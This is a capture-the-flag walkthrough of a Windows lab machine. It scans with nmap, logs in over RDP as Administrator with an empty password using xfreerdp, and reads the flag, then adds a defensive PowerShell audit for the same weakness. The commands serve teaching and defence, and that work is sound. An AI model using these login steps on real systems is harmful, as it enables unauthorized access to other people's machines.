⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing

Explosion introduces RDP (Remote Desktop Protocol) — Microsoft's graphical remote access protocol. In this machine, the Administrator account has no password set, allowing direct GUI access to a Windows desktop. RDP with weak or empty credentials is one of the highest-impact findings in external penetration tests.

Tools: nmap · xfreerdp  ·  Difficulty: Very Easy  ·  OS: Windows
01 — What You Will Learn
| Skill | Why it matters |
|---|---|
| Identifying RDP with Nmap | Port 3389 on Windows is always worth probing — many orgs expose it directly to the internet |
| xfreerdp from Linux | The standard RDP client on Kali/Parrot for connecting to Windows targets |
| Empty-password Administrator | A surprisingly common finding — default installs sometimes ship with no admin password |
| GUI post-exploitation | RDP gives an interactive desktop — useful for running tools, exfiltrating data, and pivoting |
02 — Reconnaissance
Nmap scan
nmap -sV -sC -p- --min-rate 5000 10.129.x.x
Relevant output
    PORT     STATE SERVICE       VERSION
    135/tcp  open  msrpc         Microsoft Windows RPC
    139/tcp  open  netbios-ssn
    445/tcp  open  microsoft-ds  Windows 10
    3389/tcp open  ms-wbt-server Microsoft Terminal Services
    | rdp-enum-encryption:
    |   Security layer: RDP Security Layer
    |_  RDP Protocol Version: RDP 5.x, 6.x, 7.x, 8.x, 10.x

What you're seeing: port 3389 is open — the standard RDP port. The rdp-enum-encryption Nmap script confirms it's a genuine Microsoft Terminal Services endpoint, not a honeypot or non-standard service.

⚠  RDP exposed on the internet is a primary ransomware entry point. Threat actors actively scan for 3389 and use credential stuffing, brute force, and stolen credentials to gain initial access.
03 — Exploitation

Connect using xfreerdp. Attempt the Administrator account with an empty password.

Connect with xfreerdp
xfreerdp /u:Administrator /p:"" /v:10.129.x.x

A Windows desktop opens. You now have full GUI access to the machine as Administrator.

xfreerdp flag reference
| Flag | Meaning |
|---|---|
| /u:<user> | Username to authenticate with |
| /p:<pass> | Password (use "" for empty) |
| /v:<host> | Target IP or hostname |
| /d:<domain> | Domain name for domain accounts |
| /cert:ignore | Skip certificate verification (common on internal targets) |
| /dynamic-resolution | Allow window resizing |
| /drive:kali,/tmp | Mount a local folder inside the RDP session |
ℹ  If you get a certificate warning, add /cert:ignore to the command. In real engagements, self-signed RDP certificates are the norm on internal hosts.
04 — Finding the Flag

Once connected, open File Explorer or a Command Prompt and navigate to the Administrator's desktop.

Via Command Prompt in the RDP session
type C:\Users\Administrator\Desktop\flag.txt
✓ Submit the flag string to complete the machine.
05 — Key Takeaways
RDP with no password is an instant critical. It's a full graphical shell as an administrator — equivalent to sitting physically in front of the machine.
| Concept | Real-world relevance |
|---|---|
| Empty admin password | Default Windows installs in some environments ship without a set admin password — always try empty before brute-forcing |
| RDP = full GUI access | Unlike a shell, RDP lets you interact with the entire desktop, run GUI tools, and access browser sessions |
| Port 3389 on the internet | External RDP is in the top-5 initial access vectors for ransomware — always flag it as critical |
| Drive mounting in xfreerdp | The /drive flag lets you transfer files in and out of the session without SMB or FTP |
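
Defender's view of the finding above, as an added example that is not part of the original write-up: a PowerShell audit that checks a Windows host for the conditions this machine relies on (RDP enabled, blank passwords usable remotely, and an account that may have none). The registry values and cmdlets are standard Windows ones; the function name Test-RdpExposure is hypothetical.

```powershell
# Added example, not from the original write-up. Run elevated on the Windows
# host being audited. Test-RdpExposure is a hypothetical function name.
function Test-RdpExposure {
    $ts  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $tcp = Get-ItemProperty -Path "$ts\WinStations\RDP-Tcp"

    # fDenyTSConnections = 0 means Remote Desktop is enabled.
    $rdpEnabled = (Get-ItemProperty -Path $ts).fDenyTSConnections -eq 0

    # UserAuthentication = 1 means Network Level Authentication is required.
    $nlaRequired = $tcp.UserAuthentication -eq 1

    # LimitBlankPasswordUse = 1 (the Windows default) restricts blank-password
    # local accounts to console logon, so they cannot log on over RDP.
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $blankBlocked = $lsa.LimitBlankPasswordUse -eq 1

    # Enabled local accounts whose password was never set or is not required.
    # This is an indicator to review, not proof that the password is empty.
    $suspect = @(Get-LocalUser | Where-Object {
        $_.Enabled -and (-not $_.PasswordRequired -or $null -eq $_.PasswordLastSet)
    } | Select-Object -ExpandProperty Name)

    # Is anything actually listening on the configured RDP port?
    $listening = [bool](Get-NetTCPConnection -State Listen `
        -LocalPort $tcp.PortNumber -ErrorAction SilentlyContinue)

    [pscustomobject]@{
        RdpEnabled           = $rdpEnabled
        RdpPort              = $tcp.PortNumber
        Listening            = $listening
        NlaRequired          = $nlaRequired
        BlankPasswordBlocked = $blankBlocked
        SuspectAccounts      = $suspect -join ', '
        # The write-up's condition: RDP on, blank passwords allowed remotely,
        # and at least one account that may have none.
        Critical             = $rdpEnabled -and (-not $blankBlocked) -and ($suspect.Count -gt 0)
    }
}

Test-RdpExposure | Format-List
```

A host reporting Critical = True should have passwords set on the listed accounts and LimitBlankPasswordUse restored to 1 before RDP is reachable from any untrusted network.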